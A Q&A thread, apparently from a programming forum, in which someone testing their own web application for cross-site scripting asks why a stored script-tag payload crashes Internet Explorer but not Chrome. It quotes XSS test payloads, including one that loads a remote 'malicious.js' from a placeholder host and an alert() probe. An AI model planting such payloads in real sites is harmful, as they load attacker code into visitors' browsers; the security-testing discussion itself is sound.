# Web application crashing due to XSS script in IE but not in google chrome, but both browser's are processing the script?

Tags: xss, antixsslibrary

I'm testing an web application against xss attack. In that there are list of events and each one has comment area, in one of the event, i inserted this script,

```
<script src=”http://www.example.com/malicious.js”></script >
```

The event showed a flag, that there is a comment, but it is not getting displayed. The problem here is whenever i click on that event, the app crashes, and the browser gives "Recover page".

But in Chrome, it is accepting that script, displays it as empty comment(" "), and its not getting crashed why?

I reset the browser settings in IE, but the same issue appears.
So is that due to Chrome not processing the virus(not sure), or IE processes it?

And i tried this script,

```
<script >alert("Hello");</script >
```

Both browsers acts in a same ways without crashing.

So can you please give me an idea of whats happening in it?

Answer (score 0, accepted):

You appear to be using some non-standard quotation marks. Try replacing with this:

```
<script src="http://www.example.com/malicious.js"></script>
```

Comment: i tried using standard quatation marks too, but same thing happening(i mean the crash). In this script, by changing the quotation marks                                                    <script >alert("Hello");</script >, its not displaying the alert, but still the empty comment getting displayed.

Comment: In that case it may be down to the code in the file you are linking. Try saving a working script in a file and then doing the same method on your first example, with the new, basic file and see if it still crashes.

Comment: it works fine with the alert command. But whats the problem with ie, while using this code     <script src=”http://www.example.com/malicious.js”></script > ,but chrome is fine

Comment: Do i need to change any internet security settings to overcome this?

Comment: What I am saying is: try and include a file which you know works, like <script src="http://code.jquery.com/jquery-1.9.1.min.js"></script> and if it does it means that malicious.js (or whatever that is) is causing the problem.